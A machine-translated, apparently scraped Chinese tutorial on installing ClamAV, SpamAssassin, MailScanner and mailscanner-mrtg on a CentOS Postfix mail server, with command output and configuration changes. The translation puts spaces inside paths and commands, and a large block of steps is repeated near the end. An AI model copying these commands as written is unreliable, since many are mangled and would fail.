Update 0 Package (s)
Remove 0 Package (s)
Total download size: 11 M
Is this ok [y / N]: y
Downloading Packages:
Downloading Packages:
(1 / 2): clamav-0.91.2-1.el 100% |=========================| 1.1 MB 02:31
(2 / 2): clamav-db-0.91.2-1 100% |=========================| 10 MB 21:27
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: clamav-db ######################### [1 / 2]
Installing: clamav ######################### [2 / 2]
Installed: clamav.i386 0:0.91.2-1. El4.rf
Dependency Installed: clamav-db.i386 0:0.91.2-1. El4.rf
Complete!
2. Antivirus software virus definition updates;
[root @ mail ~] # / usr / bin / freshclam
ClamAV update process started at Fri Aug 31 18:55:00 2007
Downloading daily.cvd [100%]
daily.cvd updated (version: 4110, sigs: 16448, f-level: 21, builder: acab)
Database updated (149611 signatures) from db.cn.clamav.net (IP: 58.221.222.69)
WARNING: Clamd was NOT notified: Can't find or parse configuration file / etc / clamd.conf
3. In view of the above signature to upgrade the warning message: it is because the way through the yum RPM installed clamav package, the generated configuration file, not in / etc directory and the file named clamav.conf, according to the following steps:
[root @ mail etc] # find /-name clam *
find: / proc/801/task: No such file or directory
find: / proc/802/task: No such file or directory
find: / proc/803/task: No such file or directory
find: / proc/928/task: No such file or directory
find: / proc/936/task: No such file or directory
/ etc / log.d / conf / services / clamav.conf
[root @ mail etc] # cp / etc / log.d / conf / services / clamav.conf / etc / clamd.conf
4. Spamassassin anti-spam software installation;
[root @ mail ~] # yum-y install spamassassin
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
spamassassin i386 3.2.3-1.el4.rf dag 1.0 M
Installing for dependencies:
perl-Archive-Tar noarch 1.32-1.el4.rf dag 47 k
perl-Digest-HMAC noarch 1.01-13 base 11 k
perl-Digest-SHA1 i386 2.07-5 base 19 k
perl-IO-Socket-SSL noarch 1.07-2.el4.rf dag 43 k
perl-IO-Zlib noarch 1.05-1.el4.rf dag 15 k
perl-Net-DNS i386 0.61-1.el4.rf dag 271 k
perl-Net-IP noarch 1.25-1.el4.rf dag 30 k
perl-Net-SSLeay i386 1.30-4.el4.centos extras 198 k
perl-Time-HiRes i386 1.55-3 base 22 k
Updating for dependencies:
perl-HTML-Parser i386 3.55-1.el4.rf dag 140 k
Transaction Summary
================================================== ===========================
Install 10 Package (s)
Update 1 Package (s)
Remove 0 Package (s)
Total download size: 1.8 M
Downloading Packages:
(1 / 11): perl-HTML-Parser-100% |=========================| 140 kB 00:24
(2 / 11): perl-Digest-HMAC-100% |=========================| 11 kB 00:05
(3 / 11): perl-Net-DNS-0.61 100% |=========================| 271 kB 00:35
(4 / 11): perl-Net-SSLeay-1 100% |=========================| 198 kB 00:06
(5 / 11): perl-Digest-SHA1-100% |=========================| 19 kB 00:04
(6 / 11): perl-Net-IP-1.25-100% |=========================| 30 kB 00:06
(7 / 11): perl-Time-HiRes-1 100% |=========================| 22 kB 00:04
(8 / 11): perl-IO-Socket-SS 100% |=========================| 43 kB 00:06
(9 / 11): perl-Archive-Tar-100% |=========================| 47 kB 00:07
(10/11): spamassassin-3.2 100% |=========================| 1.0 MB 02:19
(11/11): perl-IO-Zlib-1.0 100% |=========================| 15 kB 00:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: perl-Digest-SHA1 ####################### [1 / 12]
Updating: perl-HTML-Parser ####################### [2 / 12]
Installing: perl-Digest-HMAC ####################### [3 / 12]
Installing: perl-IO-Zlib ####################### [4 / 12]
Installing: perl-Archive-Tar ####################### [5 / 12]
Installing: perl-Time-HiRes ####################### [6 / 12]
Installing: perl-Net-IP ####################### [7 / 12]
Installing: perl-Net-DNS ####################### [8 / 12]
Installing: perl-Net-SSLeay ####################### [9 / 12]
Installing: perl-IO-Socket-SSL ####################### [10/12]
Installing: spamassassin ####################### [11/12]
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "en_US.en"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ( "C").
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "en_US.en"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ( "C").
Cleanup: perl-HTML-Parser ####################### [12/12]
Installed: spamassassin.i386 0:3.2.3-1. El4.rf
Dependency Installed: perl-Archive-Tar.noarch 0:1.32-1. El4.rf perl-Digest-HMAC.noarch 0:1.01-13 perl-Digest-SHA1.i386 0:2.07-5 perl-IO-Socket-SSL . noarch 0:1.07-2. el4.rf perl-IO-Zlib.noarch 0:1.05-1. el4.rf perl-Net-DNS.i386 0:0.61-1. el4.rf perl-Net-IP.noarch 0:1.25-1. el4.rf perl-Net-SSLeay.i386 0:1.30-4. el4.centos perl-Time-HiRes.i386 0:1.55-3
Dependency Updated: perl-HTML-Parser.i386 0:3.55-1. El4.rf
Complete!
[root @ mail ~] #
5. Against the above warning message in red font, we should make some corrections / etc/sysconfig/i18n documents, if we do not modify the installation when MailScanner each are prompted to restart, but not aware of the impact of no other!
[root @ mail ~] # vi / etc/sysconfig/i18n
Add the following command line:
LC_ALL = "C"
And: LANG = "en_US.UTF-8"
Changed to: LANG = "en_US"
6. Next, we installed MailScanner, first of all we have to download, go to the official line, the address: http://www.mailscanner.info/ download.
[root @ mail tmp] # wget http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz
- 16:40:51 - http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz
=> `MailScanner-4.62.9-3.rpm.tar.gz '
Resolving http://www.mailscanner.info/ ... 81.17.252.15
Connecting to http://www.mailscanner.info/|81.17.252.15|:80 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 4,239,584 (4.0M) [application / x-gzip]
100 %[====================================>] 4,239,584 6.74K / s ETA 00:00
16:50:54 (6.88 KB / s) - `MailScanner-4.62.9-3.rpm.tar.gz 'saved [4239584/4239584]
[root @ mail tmp] # tar zxvf MailScanner-4.62.9-3.rpm.tar.gz # extract the package
[root @ mail tmp] # cd MailScanner-4.62.9-3
[root @ mail MailScanner-4.62.9-3] #. / install.sh # the process is longer, at this time to drink a cup, ha ha!
Good. You have the patch command.
Good, you have / usr / src / redhat in place.
Writing a. Rpmmacros file in your home directory to stop
unpackaged files breaking the build process.
You can delete it once MailScanner is installed if you want to.
Now to install MailScanner itself.
NOTE: If you get lots of errors here, run the install.sh script
NOTE: again with the command ". / Install.sh nodeps"
Preparing ... ########################################### [100% ]
1: mailscanner ########################################### [100%]
Good, SpamAssassin site rules found in / etc / mail / spamassassin
To activate MailScanner run the following commands:
service sendmail stop
chkconfig sendmail off
chkconfig - level 2345 MailScanner on
service MailScanner start
For technical support, please read the MAQ at www.mailscanner.biz/maq/
and buy the book at www.mailscanner.info / store
-------------------------------------------------- --------
Please buy the MailScanner book from http://www.mailscanner.info/!
It is a very useful administration guide and introduction
to MailScanner. All the proceeds go directly to making
MailScanner a better supported package than it is today.
7. POSTFIX configuration settings using MainScanner and MailScanner and clamav call SA; (red words to be modified, green for modified content.
[root @ mail MailScanner-4.62.9-3] # vi / etc / MailScanner / MailScanner.conf
% org-name% = yoursite
% org-name% = centosmail
% org-long-name% = Your Organisation Name Here
% org-long-name% = CentosMail_Leeki.Yan
% web-site% = http://www.your-organisation.com/
% web-site% = http://www.centos.eb.cn/
Run As User =
Run As User = postfix
Run As Group =
Run As Group = postfix
Incoming Queue Dir = / var / spool / mqueue.in
Incoming Queue Dir = / var / spool / postfix / hold
Outgoing Queue Dir = / var / spool / mqueue
Outgoing Queue Dir = / var / spool / postfix / incoming
MTA = sendmail
MTA = postfix
Virus Scanners = auto
Virus Scanners = clamav
Always Include SpamAssassin Report = no
Always Include SpamAssassin Report = yes
SpamAssassin User State Dir =
SpamAssassin User State Dir = / var / spool / MailScanner / spamassassin
Incoming Work User =
Incoming Work Group =
Incoming Work User = postfix
Incoming Work Group = postfix
SpamAssassin Install Prefix =
SpamAssassin Install Prefix = / usr / bin
Quarantine User =
Quarantine Group =
Quarantine User = postfix
Quarantine Group = postfix
[root @ mail MailScanner-4.62.9-3] # vi / etc / MailScanner / MailScanner.conf
[root @ mail MailScanner-4.62.9-3] # cd / var / spool / MailScanner /
[root @ mail MailScanner] # ls-al
total 20
drwxr-xr-x 4 root root 4096 Aug 31 20:34.
drwxr-xr-x 16 root root 4096 Aug 31 20:34 ..
drwxr-xr-x 8 root root 4096 Aug 31 21:01 incoming
drwxr-xr-x 2 root root 4096 Aug 31 20:34 quarantine
[root @ mail MailScanner] # mkdir spamassassin
[root @ mail MailScanner] # mkdir. spamassassin
[root @ mail MailScanner] # chown-R postfix: postfix / var / spool / MailScanner / *
[root @ mail MailScanner] # ls-al
total 28
drwxr-xr-x 6 root root 4096 Aug 31 21:48.
drwxr-xr-x 16 root root 4096 Aug 31 20:34 ..
drwxr-xr-x 2 root root 4096 Aug 31 21:48. spamassassin
drwxr-xr-x 8 postfix postfix 4096 Aug 31 21:01 incoming
drwxr-xr-x 2 postfix postfix 4096 Aug 31 20:34 quarantine
drwxr-xr-x 2 postfix postfix 4096 Aug 31 21:48 spamassassin
Main.cf file modified to allow the use of MainScanner;
[root @ mail MailScanner] # vi / etc / postfix / main.cf
Will be: # header_checks = regexp: / etc / postfix / header_checks
Changed to: header_checks = regexp: / etc / postfix / header_checks
[root @ mail MailScanner] # mv / etc / postfix / header_checks / etc / postfix / header_checks.bak
[root @ mail MailScanner] # vi / etc / postfix / header_checks
Add the following command:
(Note that Office space to use tab key, add the following content)
/ ^ Received: / HOLD
[root @ mail MailScanner] # chkconfig spamassassin on
[root @ mail MailScanner] # service spamassassin start
Starting spamd: [OK]
[root @ mail MailScanner] #
[root @ mail MailScanner] # chkconfig postfix off # turn off self-starting postfix, MailScanner start by automatically start postfix
[root @ mail MailScanner] # chkconfig MailScanner on
[root @ mail MailScanner] # / etc / rc.d / init.d / MailScanner start
Starting MailScanner daemons:
incoming postfix: [OK]
outgoing postfix: [OK]
MailScanner: [OK]
See clamav has not started, use the following command:
[root @ mail MailScanner] # ps-aux | grep clamd
Warning: bad syntax, perhaps a bogus' - '? See / usr/share/doc/procps-3.2.3/FAQ
root 12603 0.0 0.2 2992 444 pts / 0 S + 22:08 0:00 grep clamd
8. Restarted the machine about to start testing it!
[root @ mail ~] # tail-f / var / log / maillog
Send a message to start the test can be found in the log to the following:
Aug 31 22:23:18 mail MailScanner [2600]: Using locktype = flock
Aug 31 22:23:18 mail MailScanner [3338]: Using SpamAssassin results cache
Aug 31 22:23:18 mail MailScanner [3338]: Connected to SpamAssassin cache database
Aug 31 22:23:18 mail MailScanner [3338]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 31 22:23:33 mail MailScanner [2709]: Using locktype = flock
Aug 31 22:23:36 mail MailScanner [3264]: Using locktype = flock
Aug 31 22:23:38 mail MailScanner [3336]: Using locktype = flock
Aug 31 22:23:39 mail MailScanner [3338]: Using locktype = flock
Aug 31 22:24:13 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
Aug 31 22:25:39 mail postfix / smtpd [3345]: connect from unknown [10.0.0.25]
Aug 31 22:25:39 mail postfix / smtpd [3345]: C38C71702CA: client = unknown [10.0.0.25]
Aug 31 22:25:40 mail postfix / cleanup [3348]: C38C71702CA: hold: header Received: from ts (unknown [10.0.0.25])?? By mail.centos.eb.cn (Postfix) with SMTP id C38C71702CA? ? for; Fri, 31 Aug 2007 22:25:39 +0800 (CST) from unknown [10.0.0.25]; from = to = proto = SMTP helo =
Aug 31 22:25:40 mail postfix / cleanup [3348]: C38C71702CA: message-id = <001901c7ebdb $ f70f9ff0 $ 1900000a @ triumph>
Aug 31 22:25:40 mail postfix / smtpd [3345]: disconnect from unknown [10.0.0.25]
Aug 31 22:25:43 mail MailScanner [3264]: New Batch: Scanning 1 messages, 934 bytes
Aug 31 22:25:59 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
Aug 31 22:25:59 mail MailScanner [3264]: Virus and Content Scanning: Starting
Aug 31 22:26:14 mail MailScanner [3264]: Requeue: C38C71702CA.8937F to 14A741702E8
Aug 31 22:26:14 mail MailScanner [3264]: Uninfected: Delivered 1 messages
Aug 31 22:26:14 mail postfix / qmgr [2579]: 14A741702E8: from =, size = 1212, nrcpt = 1 (queue active)
Aug 31 22:26:14 mail postfix / local [3361]: 14A741702E8: to =, relay = local, delay = 35, status = sent (delivered to maildir)
Aug 31 22:26:14 mail postfix / qmgr [2579]: 14A741702E8: removed
Aug 31 22:28:29 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
From the above we can see the log, MailScanner has begun to play a role!
9. MailScanner.conf another configuration file other parameters Description:
a. use mailscanner with letters automatically add this content:
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean
The abolition of such a set method: vi / etc / MailScanner / MailScaner.conf
Sign Clean Messages = yes
Change
Sign Clean Messages = no
b. from the Internet to find a translated Chinese documents report, after warning the event will be made in Chinese warning information;
mv cn /etc/MailScanner/reports即可
/ etc / MailScanner / reports / en
Because some Chinese do not have all the LOG error:
Methods:
cd / etc / MailScanner / reports / cn
cp .. / en / * .. / cn
When prompted coverage, the election can be n!
c. do not set up to scan the area:
Edit / etc / MailScanner / MailScanner.conf documents
Modification Is Definitely Not Spam = / etc / MailScanner / rules / spam.whitelist.rules
vi / etc / MailScanner / rules / spam.whitelist.rules
Join the From: * @ centos.eb.cn yes # centos.eb.cn is a local domain name
Restart MailScannerl.
In / etc / mail / spamassassin / local.cf added inside whitelist_from * @ trinet.com.cn
This e-mail sent out will not be marked as spam, but it has been checked, I would like to ask, the distinction between these two settings there?
A: The settings whitelist_from, actually spam or check will be conducted, whitelist_from Score regard is that at -100
The tag set is not directly spam.whitelist.rules spam, spam is no longer to carry out inspections.
d.
Max Children = 5 #
This is the process of setting MailScanner, and if your computer if not strong, it is recommended you set up a small value, because the cost comparison MailScanner
Source, especially memory
e.Virus Scanner Timeout = 30 # virus killing software scans your e-mail, the longest period
f.Find Phishing Fraud = yes # whether or not to open e-mail anti-phishing detection
g.
Filename Rules =% etc-dir% / filename.rules.conf
Filetype Rules =% etc-dir% / filetype.rules.conf # these two parameters used to set up your e-mail system can receive or send the name of the annex to which
h.
Max SpamAssassin Size = 1024k # set spamassassin to scan only the largest number of e-mail
i:
Syslog Facility = mail
Log Speed = no
Log Spam = no
Log Non Spam = no
Log Permitted Filenames = no
Log Permitted Filetypes = no
Log Silent Viruses = no
Log Dangerous HTML Tags = no # These parameters are set above MailScanner logs in maillog record relevant information. If your computer if not strong, I suggest you no right or election.
10. Mailscanner-mrtg installation to monitor the flow of messages;
[root @ mail tmp] # wget http://nchc.dl.sourceforge.net/sourceforge/mailscannermrtg/mailscanner-mrtg-0.10.00-1.noarch.rpm
[root @ mail tmp] # rpm-ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
error: Failed dependencies:
mrtg> = 2.9 is needed by mailscanner-mrtg-0.10.00-1.noarch
Suggested resolutions:
/ home/buildcentos/CENTOS/en/4.0/i386/CentOS/RPMS/mrtg-2.10.15-1.i386.rpm
The above error appears, this is dependent on the causes of packet, then install mrtg, and then install mailscanner-mrtg
[root @ mail tmp] # yum-y install mrtg
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
mrtg i386 2.10.15-1 base 914 k
Installing for dependencies:
gd i386 2.0.28-5.4E base 119 k
Transaction Summary
================================================== ===========================
Install 2 Package (s)
Update 0 Package (s)
Remove 0 Package (s)
Total download size: 1.0 M
Downloading Packages:
(1 / 2): gd-2.0.28-5.4E.i38 100% |=========================| 119 kB 02:48
(2 / 2): mrtg-2.10.15-1.i38 100% |=========================| 914 kB 13:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: gd ######################### [1 / 2]
Installing: mrtg ######################### [2 / 2]
Installed: mrtg.i386 0:2.10.15-1
Dependency Installed: gd.i386 0:2.0.28-5.4 E
Complete!
Re-install mailscanner-mrtg, found can be installed, see the following:
[root @ mail tmp] # rpm-ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
Preparing ... ########################################### [100% ]
1: mailscanner-mrtg ########################################### [100 %]
Running MRTG to get your initial graphs (Could be slow)
Stopping httpd: [FAILED]
Starting httpd: httpd: Could not determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[OK]
Note: in mailscanner-mrtg installed, it was found inside the maillog below the total reported errors;
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: ERROR: Snmpwalk Binary
specified in / etc / MailScanner / mailscanner-mrtg.conf is not executable
or not present. Maybe you need to install the snmp or snmp-utils
packages. See the README.SNMP file in the docs. - Skipping snmp
functions
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: Unable to find a
mountpoint for / var / spool. Please set Spool Directory in mailscanner -
mrtg.conf to a valid mountpoint. You can see a list of mointpoints on
your system by using the df command.
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: Unable to find a
mountpoint for / var / spool / MailScanner / incoming. Please set MailScanner
Work Directory in mailscanner-mrtg.conf to a valid mountpoint. You can
see a list of mointpoints on your system by using the df command
Error detection of the above: (because there is no snmp package installed, the CPU, MEM, such as for the empty icon)
vi / etc / Mailscanner / mailscanner-mrtg.conf
Shall
Use SNMP = yes
Snmpwalk Binary = / usr / bin / snmpwalk
MailScanner Work Directory = / var / spool / MailScanner / incoming
Spool Directory = / var / spool
Amended to read:
# Use SNMP = yes
# Snmpwalk Binary = / usr / bin / snmpwalk
MailScanner Work Directory = /
Spool Directory = /
11. Apache configuration and self-starting mailscanner-mrtg parameters Laws (on an article is already installed apache)
[root @ mail tmp] # chkconfig httpd on
[root @ mail tmp] # vi / etc / MailScanner / mailscanner-mrtg.conf
MTA = sendmail
MTA = postfix
Incoming Queue Dir = / var / spool / mqueue.in / # Sendmail
Incoming Queue Dir = / var / spool / postfix / hold / # Postfix
Outgoing Queue Dir = / var / spool / mqueue / # Sendmail
Outgoing Queue Dir = / var / spool / postfix / incoming / # Sendmail
Interfaces to Monitor = eth0 (this parameter as the case may be modified, use ifconfig-a check before making a decision)
For example, no need to modify the machine on! See the following: blue font
[root @ mail tmp] # ifconfig-a
eth0 Link encap: Ethernet HWaddr 00: C0: A8: F5: 06: CD
inet addr: 10.6.6.111 Bcast: 10.255.255.255 Mask: 255.0.0.0
inet6 addr: fe80:: 2c0: a8ff: fef5: 6cd/64 Scope: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 5950 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 3547 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 1000
RX bytes: 1585146 (1.5 MiB) TX bytes: 463239 (452.3 KiB)
Click to restart the apache service, and then in the browser, type http:// the IP address of the mail server / mailscanner-mrtg / traffic plans will be able to see the!
12. Other settings;
a. Automatic Updates settings Virus database:
[root @ mail tmp] # vi / etc / freshclam.conf
Increase: LogFileMaxSize 2M
Will be # PidFile / var / run / freshclam.pid
Changed to: PidFile / var / run / freshclam.pid
[root @ mail tmp] # crontab-e
0 * / 12 * * * / usr / bin / freshclam - quiet-l / var / log / clamav / freshclam.log table updates every 12 hours the first time
b. set up spamassassin, support Chinese CCERT spam filtering rule sets and automatic update
[root @ mail tmp] # wget-N-P / usr / share / spamassassin www.ccert.edu.cn / spam / sa / Chinese_rules.cf
[root @ mail tmp] # crontab-e
Copy the following line to the inside, automatically update the rules
0 0 1 * * wget-N-P / usr / share / spamassassin www.ccert.edu.cn / spam / sa / Chinese_rules.cf; / etc / rc.d / init.d / spamassassin restart
# Sa-learn - sync-D-p user_prefs (Learning System)
# sa-learn - dump all (see the data from the study)
13. This anti-virus anti-spam features have been achieved, do not pay particular attention to one thing:
MailScanner.conf in which a parameter
Original value: SpamAssassin Local Rules Dir =
Many online references for this parameter is set to the document:
SpamAssassin Local Rules Dir = / etc / MailScanner
I recommend not setting this parameter, because I found the installation time, in accordance with the relevant Gateway set-line, the e-mail all the cards in the queue, the total weight of the log in the following information is reported, but no error message, depressed ah !
Aug 25 22:58:27 mail MailScanner [5619]: Using SpamAssassin results cache
Aug 25 22:58:27 mail MailScanner [5619]: Connected to SpamAssassin cache database
Aug 25 22:58:27 mail MailScanner [5619]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:30 mail MailScanner [5620]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:30 mail MailScanner [5620]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:30 mail MailScanner [5620]: SpamAssassin temporary working directory is / var / spool / MailScanner / incoming / SpamAssassin-Temp
Aug 25 22:58:32 mail MailScanner [5620]: Using SpamAssassin results cache
Aug 25 22:58:32 mail MailScanner [5620]: Connected to SpamAssassin cache database
Aug 25 22:58:32 mail MailScanner [5620]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:35 mail MailScanner [5626]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:35 mail MailScanner [5626]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:36 mail MailScanner [5626]: SpamAssassin temporary working directory is / var / spool / MailScanner / incoming / SpamAssassin-Temp
See queue found: whether or receive letters, e-mail all the cards in the queue: the tests made and received, will be stuck in the queue in
[root @ mail incoming] # mailq
-Queue ID-- Size - ---- Arrival Time ---- -Sender/Recipient-------
695912341DA! 5535 Sat Aug 25 22:55:59 root@centos.eb.cn
root@centos.eb.cn
07D6B2341D8! 11042 Sat Aug 25 22:34:34 leeki.yan @ centos.eb.cn
leeki.yan @ centos.eb.cn
BEEBD2341D9! 2085 Sat Aug 25 23:00:58 leeki.yan @ centos.eb.cn
leeki.yan @ centos.eb.cn
- 18 Kbytes in 3 Requests.
阅读全文...
1. Clamav anti-virus software installed;
[root @ mail ~] # yum install clamav
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
clamav i386 0.91.2-1.el4.rf dag 1.1 M
Installing for dependencies:
clamav-db i386 0.91.2-1.el4.rf dag 10 M
Transaction Summary
================================================== ===========================
Install 2 Package (s)
Update 0 Package (s)
Remove 0 Package (s)
Total download size: 11 M
Is this ok [y / N]: y
Downloading Packages:
Downloading Packages:
(1 / 2): clamav-0.91.2-1.el 100% |=========================| 1.1 MB 02:31
(2 / 2): clamav-db-0.91.2-1 100% |=========================| 10 MB 21:27
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: clamav-db ######################### [1 / 2]
Installing: clamav ######################### [2 / 2]
Installed: clamav.i386 0:0.91.2-1. El4.rf
Dependency Installed: clamav-db.i386 0:0.91.2-1. El4.rf
Complete!
2. Antivirus software virus definition updates;
[root @ mail ~] # / usr / bin / freshclam
ClamAV update process started at Fri Aug 31 18:55:00 2007
Downloading daily.cvd [100%]
daily.cvd updated (version: 4110, sigs: 16448, f-level: 21, builder: acab)
Database updated (149611 signatures) from db.cn.clamav.net (IP: 58.221.222.69)
WARNING: Clamd was NOT notified: Can't find or parse configuration file / etc / clamd.conf
3. In view of the above signature to upgrade the warning message: it is because the way through the yum RPM installed clamav package, the generated configuration file, not in / etc directory and the file named clamav.conf, according to the following steps:
[root @ mail etc] # find /-name clam *
find: / proc/801/task: No such file or directory
find: / proc/802/task: No such file or directory
find: / proc/803/task: No such file or directory
find: / proc/928/task: No such file or directory
find: / proc/936/task: No such file or directory
/ etc / log.d / conf / services / clamav.conf
[root @ mail etc] # cp / etc / log.d / conf / services / clamav.conf / etc / clamd.conf
4. Spamassassin anti-spam software installation;
[root @ mail ~] # yum-y install spamassassin
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
spamassassin i386 3.2.3-1.el4.rf dag 1.0 M
Installing for dependencies:
perl-Archive-Tar noarch 1.32-1.el4.rf dag 47 k
perl-Digest-HMAC noarch 1.01-13 base 11 k
perl-Digest-SHA1 i386 2.07-5 base 19 k
perl-IO-Socket-SSL noarch 1.07-2.el4.rf dag 43 k
perl-IO-Zlib noarch 1.05-1.el4.rf dag 15 k
perl-Net-DNS i386 0.61-1.el4.rf dag 271 k
perl-Net-IP noarch 1.25-1.el4.rf dag 30 k
perl-Net-SSLeay i386 1.30-4.el4.centos extras 198 k
perl-Time-HiRes i386 1.55-3 base 22 k
Updating for dependencies:
perl-HTML-Parser i386 3.55-1.el4.rf dag 140 k
Transaction Summary
================================================== ===========================
Install 10 Package (s)
Update 1 Package (s)
Remove 0 Package (s)
Total download size: 1.8 M
Downloading Packages:
(1 / 11): perl-HTML-Parser-100% |=========================| 140 kB 00:24
(2 / 11): perl-Digest-HMAC-100% |=========================| 11 kB 00:05
(3 / 11): perl-Net-DNS-0.61 100% |=========================| 271 kB 00:35
(4 / 11): perl-Net-SSLeay-1 100% |=========================| 198 kB 00:06
(5 / 11): perl-Digest-SHA1-100% |=========================| 19 kB 00:04
(6 / 11): perl-Net-IP-1.25-100% |=========================| 30 kB 00:06
(7 / 11): perl-Time-HiRes-1 100% |=========================| 22 kB 00:04
(8 / 11): perl-IO-Socket-SS 100% |=========================| 43 kB 00:06
(9 / 11): perl-Archive-Tar-100% |=========================| 47 kB 00:07
(10/11): spamassassin-3.2 100% |=========================| 1.0 MB 02:19
(11/11): perl-IO-Zlib-1.0 100% |=========================| 15 kB 00:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: perl-Digest-SHA1 ####################### [1 / 12]
Updating: perl-HTML-Parser ####################### [2 / 12]
Installing: perl-Digest-HMAC ####################### [3 / 12]
Installing: perl-IO-Zlib ####################### [4 / 12]
Installing: perl-Archive-Tar ####################### [5 / 12]
Installing: perl-Time-HiRes ####################### [6 / 12]
Installing: perl-Net-IP ####################### [7 / 12]
Installing: perl-Net-DNS ####################### [8 / 12]
Installing: perl-Net-SSLeay ####################### [9 / 12]
Installing: perl-IO-Socket-SSL ####################### [10/12]
Installing: spamassassin ####################### [11/12]
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "en_US.en"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ( "C").
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "en_US.en"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ( "C").
Cleanup: perl-HTML-Parser ####################### [12/12]
Installed: spamassassin.i386 0:3.2.3-1. El4.rf
Dependency Installed: perl-Archive-Tar.noarch 0:1.32-1. El4.rf perl-Digest-HMAC.noarch 0:1.01-13 perl-Digest-SHA1.i386 0:2.07-5 perl-IO-Socket-SSL . noarch 0:1.07-2. el4.rf perl-IO-Zlib.noarch 0:1.05-1. el4.rf perl-Net-DNS.i386 0:0.61-1. el4.rf perl-Net-IP.noarch 0:1.25-1. el4.rf perl-Net-SSLeay.i386 0:1.30-4. el4.centos perl-Time-HiRes.i386 0:1.55-3
Dependency Updated: perl-HTML-Parser.i386 0:3.55-1. El4.rf
Complete!
[root @ mail ~] #
5. Against the above warning message in red font, we should make some corrections / etc/sysconfig/i18n documents, if we do not modify the installation when MailScanner each are prompted to restart, but not aware of the impact of no other!
[root @ mail ~] # vi / etc/sysconfig/i18n
Add the following command line:
LC_ALL = "C"
And: LANG = "en_US.UTF-8"
Changed to: LANG = "en_US"
6. Next, we installed MailScanner, first of all we have to download, go to the official line, the address: http://www.mailscanner.info/ download.
[root @ mail tmp] # wget http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz
- 16:40:51 - http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz
=> `MailScanner-4.62.9-3.rpm.tar.gz '
Resolving http://www.mailscanner.info/ ... 81.17.252.15
Connecting to http://www.mailscanner.info/|81.17.252.15|:80 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 4,239,584 (4.0M) [application / x-gzip]
100 %[====================================>] 4,239,584 6.74K / s ETA 00:00
16:50:54 (6.88 KB / s) - `MailScanner-4.62.9-3.rpm.tar.gz 'saved [4239584/4239584]
[root @ mail tmp] # tar zxvf MailScanner-4.62.9-3.rpm.tar.gz # extract the package
[root @ mail tmp] # cd MailScanner-4.62.9-3
[root @ mail MailScanner-4.62.9-3] #. / install.sh # the process is longer, at this time to drink a cup, ha ha!
Good. You have the patch command.
Good, you have / usr / src / redhat in place.
Writing a. Rpmmacros file in your home directory to stop
unpackaged files breaking the build process.
You can delete it once MailScanner is installed if you want to.
Now to install MailScanner itself.
NOTE: If you get lots of errors here, run the install.sh script
NOTE: again with the command ". / Install.sh nodeps"
Preparing ... ########################################### [100% ]
1: mailscanner ########################################### [100%]
Good, SpamAssassin site rules found in / etc / mail / spamassassin
To activate MailScanner run the following commands:
service sendmail stop
chkconfig sendmail off
chkconfig - level 2345 MailScanner on
service MailScanner start
For technical support, please read the MAQ at www.mailscanner.biz/maq/
and buy the book at www.mailscanner.info / store
-------------------------------------------------- --------
Please buy the MailScanner book from http://www.mailscanner.info/!
It is a very useful administration guide and introduction
to MailScanner. All the proceeds go directly to making
MailScanner a better supported package than it is today.
7. POSTFIX configuration settings using MainScanner and MailScanner and clamav call SA; (red words to be modified, green for modified content.
[root @ mail MailScanner-4.62.9-3] # vi / etc / MailScanner / MailScanner.conf
% org-name% = yoursite
% org-name% = centosmail
